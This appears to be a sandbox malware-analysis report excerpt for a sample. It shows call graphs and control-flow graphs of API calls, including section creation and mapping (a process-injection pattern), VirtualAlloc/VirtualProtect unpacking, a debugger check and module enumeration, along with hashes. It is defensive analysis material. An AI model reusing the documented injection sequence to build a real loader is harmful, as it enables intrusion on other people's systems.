6421->6423 6424 434afb5 6421->6424 6422->6420 6422->6421 6426 434b415 6423->6426 6427 434b440 6426->6427 6428 434b451 VirtualAlloc 6427->6428 6429 434b489 6427->6429 6428->6429 6429->6429 6648 40d21d 6649 40d247 6648->6649 6650 40d310 IsDebuggerPresent 6649->6650 6651 40d260 LoadLibraryExW 6649->6651 6652 40d335 6650->6652 6653 40d31a 6650->6653 6654 40d277 GetLastError 6651->6654 6655 40d29d GetProcAddress 6651->6655 6659 40d33a RtlDecodePointer 6652->6659 6660 40d328 6652->6660 6657 40d321 OutputDebugStringW 6653->6657 6653->6660 6656 40d286 LoadLibraryExW 6654->6656 6654->6660 6658 40d2b1 GetProcAddress 6655->6658 6655->6660 6656->6655 6656->6660 6657->6660 6662 40d2c8 GetProcAddress 6658->6662 6659->6660 6663 40d2dc GetProcAddress 6662->6663 6664 40d2f0 6663->6664 6665 40d2f9 GetProcAddress 6664->6665 6666 40d308 6664->6666 6665->6666 6666->6650 6644 40d660 6645 40d6bd 6644->6645 6646 40d66c 6644->6646 6646->6645 6647 40d6b7 SetStdHandle 6646->6647 6647->6645 6621 402da5 6622 402da8 6621->6622 6623 402ee5 6622->6623 6624 4018c3 15 API calls 6622->6624 6624->6623 6671 40da2b 6674 40d936 6671->6674 6675 40d945 6674->6675 6678 40d951 6674->6678 6676 40d9e5 MultiByteToWideChar 6675->6676 6677 40d9a5 6675->6677 6675->6678 6676->6678 6677->6678 6679 40d9b3 MultiByteToWideChar 6677->6679 6679->6678 6710 4013ec 6711 4013ee 6710->6711 6712 40159c NtDuplicateObject 6711->6712 6721 40147f 6711->6721 6713 4015b9 NtCreateSection 6712->6713 6712->6721 6714 401639 NtCreateSection 6713->6714 6715 4015df NtMapViewOfSection 6713->6715 6717 401665 6714->6717 6714->6721 6715->6714 6716 401602 NtMapViewOfSection 6715->6716 6716->6714 6718 401620 6716->6718 6719 40166f NtMapViewOfSection 6717->6719 6717->6721 6718->6714 6720 401696 NtMapViewOfSection 6719->6720 6719->6721 6720->6721 6520 4014ed 6521 4014f2 6520->6521 6522 40159c NtDuplicateObject 6521->6522 6531 4016b8 6521->6531 6523 4015b9 NtCreateSection 6522->6523 6522->6531 6524 401639 NtCreateSection 6523->6524 6525 4015df NtMapViewOfSection 6523->6525 6527 401665 6524->6527 6524->6531 6525->6524 6526 401602 NtMapViewOfSection 6525->6526 6526->6524 6528 401620 6526->6528 6529 40166f NtMapViewOfSection 6527->6529 6527->6531 6528->6524 6530 401696 NtMapViewOfSection 6529->6530 6529->6531 6530->6531 6430 413003c 6431 4130049 6430->6431 6443 4130e0f SetErrorMode SetErrorMode 6431->6443 6436 4130265 6437 41302ce VirtualProtect 6436->6437 6439 413030b 6437->6439 6438 4130439 VirtualFree 6440 41304be LoadLibraryA 6438->6440 6439->6438 6442 41308c7 6440->6442 6444 4130223 6443->6444 6445 4130d90 6444->6445 6446 4130dad 6445->6446 6447 4130dbb GetPEB 6446->6447 6448 4130238 VirtualAlloc 6446->6448 6447->6448 6448->6436 6539 40ecf1 6540 40ed02 6539->6540 6541 40ecf6 6539->6541 6541->6540 6542 40ecfb CloseHandle 6541->6542 6542->6540 6609 40d535 6612 40d541 6609->6612 6610 40d586 RtlDeleteCriticalSection 6610->6612 6611 40d5b2 __fcloseall 6612->6610 6612->6611 6550 40dcbd 6553 40dcc8 6550->6553 6551 40dcf3 RtlAllocateHeap 6552 40dcd4 6551->6552 6551->6553 6553->6551 6553->6552

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4013ed 1 4013ee 0->1 2 4013f0-4013f6 1->2 3 40140c 2->3 4 4013fd-40142e 2->4 3->4 10 401431-401451 call 401163 4->10 11 401425-40142a 4->11 14 401453-401462 10->14 15 401478-40147b 10->15 11->10 14->2 17 401464 14->17 16 40147d 15->16 19 401432-401451 16->19 20 40147f-4014df 16->20 17->1 18 401466-40146d 17->18 22 4014e6-4014eb 18->22 23 40146f-40147b 18->23 19->14 19->15 25 401502 22->25 26 4014f3-401546 call 401163 22->26 23->16 25->26 37 401548 26->37 38 40154b-401550 26->38 37->38 40 401866-40186e 38->40 41 401556-401567 38->41 40->38 46 401873-401889 40->46 44 401864 41->44 45 40156d-401596 41->45 44->46 45->44 55 40159c-4015b3 NtDuplicateObject 45->55 48 40187a-401885 46->48 49 40188c-4018c0 call 401163 46->49 48->49 55->44 57 4015b9-4015dd NtCreateSection 55->57 58 401639-40165f NtCreateSection 57->58 59 4015df-401600 NtMapViewOfSection 57->59 58->44 62 401665-401669 58->62 59->58 61 401602-40161e NtMapViewOfSection 59->61 61->58 64 401620-401636 61->64 62->44 65 40166f-401690 NtMapViewOfSection 62->65 64->58 65->44 67 401696-4016b2 NtMapViewOfSection 65->67 67->44 70 4016b8 call 4016bd 67->70
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSection
                    • String ID: w
                    • API String ID: 3132048701-476252946
                    • Opcode ID: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
                    • Instruction ID: d66d783c96bdfa6dca3d1fe6600e499103a6ed67321a36542f9bdd634b40576e
                    • Opcode Fuzzy Hash: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
                    • Instruction Fuzzy Hash: A0A11571904204EBEB209FA5CC44FAB7BB8FF81740F24413AF912BA2E1D7749906CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 157 4014e2-401546 call 401163 169 401548 157->169 170 40154b-401550 157->170 169->170 172 401866-40186e 170->172 173 401556-401567 170->173 172->170 178 401873-401889 172->178 176 401864 173->176 177 40156d-401596 173->177 176->178 177->176 187 40159c-4015b3 NtDuplicateObject 177->187 180 40187a-401885 178->180 181 40188c-4018c0 call 401163 178->181 180->181 187->176 189 4015b9-4015dd NtCreateSection 187->189 190 401639-40165f NtCreateSection 189->190 191 4015df-401600 NtMapViewOfSection 189->191 190->176 194 401665-401669 190->194 191->190 193 401602-40161e NtMapViewOfSection 191->193 193->190 196 401620-401636 193->196 194->176 197 40166f-401690 NtMapViewOfSection 194->197 196->190 197->176 199 401696-4016b2 NtMapViewOfSection 197->199 199->176 202 4016b8 call 4016bd 199->202
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
                    • Instruction ID: 54f816a1873a7b3c05ae102fbfa0db20c4fddfd22ceccde8511ae2322fd00f16
                    • Opcode Fuzzy Hash: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
                    • Instruction Fuzzy Hash: ED514B71900204BBEB209F91CC49FEFBBB8FF85B00F10412AF912BA2E4D6759905CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 204 4014ed-4014ef 205 4014f2-401546 call 401163 204->205 206 401547-40154a 204->206 207 40154b-401550 205->207 229 401548 205->229 206->207 212 401866-40186e 207->212 213 401556-401567 207->213 212->207 222 401873-401889 212->222 219 401864 213->219 220 40156d-401596 213->220 219->222 220->219 234 40159c-4015b3 NtDuplicateObject 220->234 226 40187a-401885 222->226 227 40188c-4018c0 call 401163 222->227 226->227 229->207 234->219 236 4015b9-4015dd NtCreateSection 234->236 237 401639-40165f NtCreateSection 236->237 238 4015df-401600 NtMapViewOfSection 236->238 237->219 241 401665-401669 237->241 238->237 240 401602-40161e NtMapViewOfSection 238->240 240->237 243 401620-401636 240->243 241->219 244 40166f-401690 NtMapViewOfSection 241->244 243->237 244->219 246 401696-4016b2 NtMapViewOfSection 244->246 246->219 249 4016b8 call 4016bd 246->249
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
                    • Instruction ID: d78456e69b9ee3bedd10ceae2949c316c70905ac9deb4f17dd21856c0d7271cf
                    • Opcode Fuzzy Hash: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
                    • Instruction Fuzzy Hash: 785139B1900209BFEB209F91CC48FEFBBB8EF85B04F144529F911BA2A5D6759945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 251 401507-401546 call 401163 259 401548 251->259 260 40154b-401550 251->260 259->260 262 401866-40186e 260->262 263 401556-401567 260->263 262->260 268 401873-401889 262->268 266 401864 263->266 267 40156d-401596 263->267 266->268 267->266 277 40159c-4015b3 NtDuplicateObject 267->277 270 40187a-401885 268->270 271 40188c-4018c0 call 401163 268->271 270->271 277->266 279 4015b9-4015dd NtCreateSection 277->279 280 401639-40165f NtCreateSection 279->280 281 4015df-401600 NtMapViewOfSection 279->281 280->266 284 401665-401669 280->284 281->280 283 401602-40161e NtMapViewOfSection 281->283 283->280 286 401620-401636 283->286 284->266 287 40166f-401690 NtMapViewOfSection 284->287 286->280 287->266 289 401696-4016b2 NtMapViewOfSection 287->289 289->266 292 4016b8 call 4016bd 289->292
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
                    • Instruction ID: 2f2d373c220c5723e0f020d1249cf16f546f345e4a7fd1e76d53166f9789eae4
                    • Opcode Fuzzy Hash: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
                    • Instruction Fuzzy Hash: CC5138B1900245BFEB209F92CC48FEFBBB8EF85B00F104129F911BA2E5D6719905CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 294 401518-401546 call 401163 303 401548 294->303 304 40154b-401550 294->304 303->304 306 401866-40186e 304->306 307 401556-401567 304->307 306->304 312 401873-401889 306->312 310 401864 307->310 311 40156d-401596 307->311 310->312 311->310 321 40159c-4015b3 NtDuplicateObject 311->321 314 40187a-401885 312->314 315 40188c-4018c0 call 401163 312->315 314->315 321->310 323 4015b9-4015dd NtCreateSection 321->323 324 401639-40165f NtCreateSection 323->324 325 4015df-401600 NtMapViewOfSection 323->325 324->310 328 401665-401669 324->328 325->324 327 401602-40161e NtMapViewOfSection 325->327 327->324 330 401620-401636 327->330 328->310 331 40166f-401690 NtMapViewOfSection 328->331 330->324 331->310 333 401696-4016b2 NtMapViewOfSection 331->333 333->310 336 4016b8 call 4016bd 333->336
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
                    • Instruction ID: 96445da88c21ac9a18ba7f06942a5f985ee594873a048ae4082ffef3eedc30ed
                    • Opcode Fuzzy Hash: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
                    • Instruction Fuzzy Hash: 765128B1900245BBEB209F92CC48FEFBBB8EF85B04F104529F911BA2E5D6759945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 40151c-401546 call 401163 342 401548 338->342 343 40154b-401550 338->343 342->343 345 401866-40186e 343->345 346 401556-401567 343->346 345->343 351 401873-401889 345->351 349 401864 346->349 350 40156d-401596 346->350 349->351 350->349 360 40159c-4015b3 NtDuplicateObject 350->360 353 40187a-401885 351->353 354 40188c-4018c0 call 401163 351->354 353->354 360->349 362 4015b9-4015dd NtCreateSection 360->362 363 401639-40165f NtCreateSection 362->363 364 4015df-401600 NtMapViewOfSection 362->364 363->349 367 401665-401669 363->367 364->363 366 401602-40161e NtMapViewOfSection 364->366 366->363 369 401620-401636 366->369 367->349 370 40166f-401690 NtMapViewOfSection 367->370 369->363 370->349 372 401696-4016b2 NtMapViewOfSection 370->372 372->349 375 4016b8 call 4016bd 372->375
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
                    • Instruction ID: bb4afbbbce9fe7f1faeb83e027975ebaba5635be540f9387007d6567f38c581b
                    • Opcode Fuzzy Hash: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
                    • Instruction Fuzzy Hash: 885119B1900245BFEF209F92CC48FDFBBB8FF85B14F144129F911AA2A5D6719945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 434b756-434b76f 378 434b771-434b773 377->378 379 434b775 378->379 380 434b77a-434b786 CreateToolhelp32Snapshot 378->380 379->380 381 434b796-434b7a3 Module32First 380->381 382 434b788-434b78e 380->382 383 434b7a5-434b7a6 call 434b415 381->383 384 434b7ac-434b7b4 381->384 382->381 387 434b790-434b794 382->387 388 434b7ab 383->388 387->378 387->381 388->384
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0434B77E
                    • Module32First.KERNEL32(00000000,00000224), ref: 0434B79E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 58e1f88ce6ce8d46c5bad3f1ce4aa3dcde2e782d0fff3dd74ead119b6bfed478
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 29F06235500710AFE7203AB598CDBAEBAE8EF89625F101628E642914C0DA70F8458A61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 413003c-4130047 73 4130049 72->73 74 413004c-4130263 call 4130a3f call 4130e0f call 4130d90 VirtualAlloc 72->74 73->74 89 4130265-4130289 call 4130a69 74->89 90 413028b-4130292 74->90 95 41302ce-41303c2 VirtualProtect call 4130cce call 4130ce7 89->95 92 41302a1-41302b0 90->92 94 41302b2-41302cc 92->94 92->95 94->92 101 41303d1-41303e0 95->101 102 41303e2-4130437 call 4130ce7 101->102 103 4130439-41304b8 VirtualFree 101->103 102->101 105 41305f4-41305fe 103->105 106 41304be-41304cd 103->106 109 4130604-413060d 105->109 110 413077f-4130789 105->110 108 41304d3-41304dd 106->108 108->105 112 41304e3-4130505 108->112 109->110 115 4130613-4130637 109->115 113 41307a6-41307b0 110->113 114 413078b-41307a3 110->114 123 4130517-4130520 112->123 124 4130507-4130515 112->124 116 41307b6-41307cb 113->116 117 413086e-41308be LoadLibraryA 113->117 114->113 118 413063e-4130648 115->118 120 41307d2-41307d5 116->120 122 41308c7-41308f9 117->122 118->110 121 413064e-413065a 118->121 125 41307d7-41307e0 120->125 126 4130824-4130833 120->126 121->110 127 4130660-413066a 121->127 130 4130902-413091d 122->130 131 41308fb-4130901 122->131 132 4130526-4130547 123->132 124->132 133 41307e2 125->133 134 41307e4-4130822 125->134 129 4130839-413083c 126->129 128 413067a-4130689 127->128 135 4130750-413077a 128->135 136 413068f-41306b2 128->136 129->117 137 413083e-4130847 129->137 131->130 138 413054d-4130550 132->138 133->126 134->120 135->118 139 41306b4-41306ed 136->139 140 41306ef-41306fc 136->140 141 413084b-413086c 137->141 142 4130849 137->142 144 41305e0-41305ef 138->144 145 4130556-413056b 138->145 139->140 148 413074b 140->148 149 41306fe-4130748 140->149 141->129 142->117 144->108 146 413056f-413057a 145->146 147 413056d 145->147 150 413059b-41305bb 146->150 151 413057c-4130599 146->151 147->144 148->128 149->148 156 41305bd-41305db 150->156 151->156 156->138
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0413024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 713d33ce624b40996217dce17fe4c48372859923d3cd94986ae5f326b4b3e256
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 2E528974A00229DFDB64CF58C984BACBBB1BF09305F1480E9E94DAB355DB30AA85DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 390 40d47b-40d489 391 40d4a6-40d4c6 call 40d451 LCMapStringW 390->391 392 40d48b-40d4a5 LCMapStringEx 390->392
                    APIs
                    • LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: String
                    • String ID:
                    • API String ID: 2568140703-0
                    • Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
                    • Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 395 4130e0f-4130e24 SetErrorMode * 2 396 4130e26 395->396 397 4130e2b-4130e2c 395->397 396->397
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,04130223,?,?), ref: 04130E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,04130223,?,?), ref: 04130E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: fee6a9d0514fcff8610eef6c0e82d5d193ba1d54c18d389b9efd760a7b657380
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: EED0123124512877D7003A94DC09BCD7F5CDF09B63F008061FB0DD9080C770954046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 4018c3-40192e call 401163 Sleep call 4013ed 412 401930-401938 call 4014e2 398->412 413 40193d-401990 call 401163 398->413 412->413
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
                    • Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
                    • Opcode Fuzzy Hash: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
                    • Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 427 4018ce-40192e call 401163 Sleep call 4013ed 436 401930-401938 call 4014e2 427->436 437 40193d-401990 call 401163 427->437 436->437
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
                    • Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
                    • Opcode Fuzzy Hash: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
                    • Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 451 4018ed-40192e call 401163 Sleep call 4013ed 462 401930-401938 call 4014e2 451->462 463 40193d-401990 call 401163 451->463 462->463
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
